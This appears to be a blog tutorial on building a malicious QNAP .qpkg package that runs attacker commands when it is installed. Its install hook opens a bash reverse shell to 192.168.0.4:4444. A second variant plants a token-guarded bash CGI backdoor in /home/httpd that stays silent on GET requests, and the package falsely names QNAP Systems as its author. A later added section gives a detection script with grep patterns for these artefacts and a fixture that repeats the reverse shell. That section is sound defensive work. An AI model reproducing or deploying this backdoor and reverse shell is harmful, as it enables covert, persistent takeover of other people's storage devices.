Today we will see how an admin can execute arbitrary commands on a Qnap. The trick is useful when you can no longer find post-auth command injections, which could well happen given how fast Qnap patches (LoL).

The technique is simple: we build a malicious Qnap package (a .qpkg file), and installing it runs commands of our choice. The same mechanism also lets us plant a light backdoor. Two variants are presented.

But first I invite you to read this documentation:

Creation of a malicious package

From /share/CACHEDEV1_DATA/.qpkg/QDK (the QDK install directory), execute the following command:

qbuild --create-env myQNAPstats


then:

cd myQNAPstats


then edit /share/CACHEDEV1_DATA/.qpkg/QDK/myQNAPstats/qpkg.cfg (with vi, for instance) so that it contains:

QPKG_NAME="myQNAPstats"
QPKG_DISPLAY_NAME="myQNAPstats"
QPKG_VER="6.0.0"
QPKG_AUTHOR="QNAP Systems, Inc."
QPKG_SUMMARY="myQNAPstats Link is the best stats service provided by myQNAPcloud."

QPKG_RC_NUM="100" #for rcS and rcK
QPKG_SERVICE_PROGRAM="myQNAPstats.sh"

QPKG_WEBUI="/stats"

QTS_MINI_VERSION="1.0.0"
QTS_MAX_VERSION="10.0.0"

Our package skeleton is ready; now we can make it malicious.

Simple execution of commands

Edit the file /share/CACHEDEV1_DATA/.qpkg/QDK/myQNAPstats/package_routines so that pkg_init() runs your commands:

######################################################################
# Define any package specific initialization that shall be performed
# before the package is installed.
######################################################################
pkg_init(){
    # Put the commands you want executed here; the installer runs pkg_init()
    # before installing the package.
    # Example: a reverse shell to 192.168.0.4:4444, backgrounded (&) so the
    # installation does not hang waiting on it.
    bash -i >& /dev/tcp/192.168.0.4/4444 0>&1 &
}
#

Then run qbuild from the package directory; the resulting .qpkg can be installed manually from the App Center:


Here is our POC in action:


Now let’s look at how to build a light backdoor.

Light backdoor

We know that the web server serves CGI scripts, and that those scripts live under /home/httpd. Since a CGI script can be written in bash, we can plant one that runs any command POSTed to it, guarded by a hardcoded token; that is why I call this technique light backdooring. Note that the script does not URL-decode the request body, so the command must be sent with literal spaces rather than + or %20. To do this, the file /share/CACHEDEV1_DATA/.qpkg/QDK/myQNAPstats/package_routines of our package (myQNAPstats) must contain the following code:

######################################################################
# Define any package specific initialization that shall be performed
# before the package is installed.
######################################################################
pkg_init(){
    # Drop a bash CGI script into the web server root. The heredoc is unquoted,
    # so every $ and backtick meant for the CGI itself is escaped with a backslash.
    # Note: >> appends, so reinstalling the package appends a second copy.
    cat <<EOF >> /home/httpd/light_backdoor.cgi
#!/bin/bash

echo "Content-type: text/html"
echo ""

# GET: reply with an empty body so the script looks inert.
if [ "\$REQUEST_METHOD" = "GET" ]; then
    echo ''
fi
# POST body is expected as "password=<token>&command=<cmd>"; the two fields are
# taken positionally and are not URL-decoded.
if [ "\$REQUEST_METHOD" = "POST" ]; then
    read -n "\$CONTENT_LENGTH" QUERY_STRING_POST
    password=\`echo "\$QUERY_STRING_POST" | awk '{split(\$0,array,"&")} END{print array[1]}' | awk '{split(\$0,array,"=")} END{print array[2]}'\`
    command=\`echo "\$QUERY_STRING_POST" | awk '{split(\$0,array,"&")} END{print array[2]}' | awk '{split(\$0,array,"=")} END{print array[2]}'\`

    # Wrong token: same empty reply as a GET.
    if [ "\$password" != "6da47ce6776f4629be2d4563a8040349dfa081b3" ]; then
        echo ''
    else
            echo '<html>'
            echo '<head>'
            echo '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">'
            echo '<title>Light backdoor POC</title>'
            echo '</head>'
            echo '<body>'
            echo "Command: \$command"
            echo '----OUTPUT_START----'
            # Word-split and run the command; its stdout is returned between the markers.
            echo "\$(\$command)"
            echo '----OUTPUT_END----'
            echo '</body>'
            echo '</html>'
    fi
fi
exit 0
EOF
    chmod +x  /home/httpd/light_backdoor.cgi
}
#
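Defender's view, as an added example that is not part of the original post: a bash script that hunts for the two artefacts both variants above leave behind, a shell-script CGI under the web root and an install hook that opens a network connection or tampers with /home/httpd. The sample tree it scans is constructed inline; the grep patterns and the heuristic that a bash/sh CGI is unusual enough to review are my own assumptions, not QNAP documentation.

```shell
#!/bin/bash
# Added example, not code from the original post: hunt for the artefacts the
# post's package leaves behind. Assumptions: paths are passed as arguments; on
# a real box you would pass /home/httpd and the directory holding the package
# sources or extracted .qpkg files. The patterns are a starting point only.
set -u

# shell_cgi_files WEBROOT: list *.cgi files whose first line is a shell shebang.
# Stock CGIs are largely native binaries, so a bash/sh CGI deserves a look.
shell_cgi_files() {
    local webroot=$1 f
    find "$webroot" -type f -name '*.cgi' 2>/dev/null | sort | while read -r f; do
        if head -n1 "$f" | grep -qE '^#!.*/(env[[:space:]]+)?(ba|da|a|k|z)?sh([[:space:]]|$)'; then
            printf '%s\n' "$f"
        fi
    done
}

# risky_hook_lines FILE: grep a package_routines for network primitives and
# web-root tampering; prints "line:text" for each hit.
risky_hook_lines() {
    grep -nE '/dev/tcp/|(^|[^a-z])(nc|ncat|netcat|socat|telnet)[[:space:]]|(curl|wget)[^|]*\|[[:space:]]*(ba)?sh|/home/httpd|chmod[[:space:]]+[+]x' "$1" 2>/dev/null
}

# routines_with_risky_hooks PKGROOT: every flagged line in every
# package_routines under PKGROOT, as "path:line:text".
routines_with_risky_hooks() {
    local f line
    find "$1" -type f -name package_routines 2>/dev/null | sort | while read -r f; do
        risky_hook_lines "$f" | while read -r line; do
            printf '%s:%s\n' "$f" "$line"
        done
    done
}

# hunt WEBROOT PKGROOT: print a report; return 1 when anything was flagged so
# the function can drive a cron job or a test.
hunt() {
    local cgis hooks
    cgis=$(shell_cgi_files "$1")
    hooks=$(routines_with_risky_hooks "$2")
    [ -n "$cgis" ] && printf 'shell CGI scripts under %s:\n%s\n' "$1" "$cgis"
    [ -n "$hooks" ] && printf 'risky install hooks under %s:\n%s\n' "$2" "$hooks"
    [ -z "$cgis$hooks" ]
}

# make_sample_tree DIR: constructed fixture mimicking a box carrying the post's
# package: a native-looking CGI, the dropped bash CGI, one malicious and one
# benign package_routines. Not real QTS content.
make_sample_tree() {
    local d=$1
    mkdir -p "$d/home/httpd/cgi-bin" "$d/qpkg/myQNAPstats" "$d/qpkg/benign"
    printf '\177ELF\002\001\001' > "$d/home/httpd/cgi-bin/native.cgi"
    printf '#!/bin/bash\necho "Content-type: text/html"\necho\necho "$($command)"\n' \
        > "$d/home/httpd/light_backdoor.cgi"
    cat > "$d/qpkg/myQNAPstats/package_routines" <<'EOF'
pkg_init(){
    bash -i >& /dev/tcp/192.168.0.4/4444 0>&1 &
    chmod +x /home/httpd/light_backdoor.cgi
}
EOF
    cat > "$d/qpkg/benign/package_routines" <<'EOF'
pkg_init(){
    echo "nothing to see here"
}
EOF
}
```

On a NAS you would run something like `hunt /home/httpd /share/CACHEDEV1_DATA/.qpkg`. Be aware of what it misses: the dropped CGI is only caught because it keeps a shell shebang, a hook is only caught if the package sources or extracted .qpkg are still on disk, and a payload that fetches its real code at runtime leaves neither pattern behind.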


Here is a small video of the POC: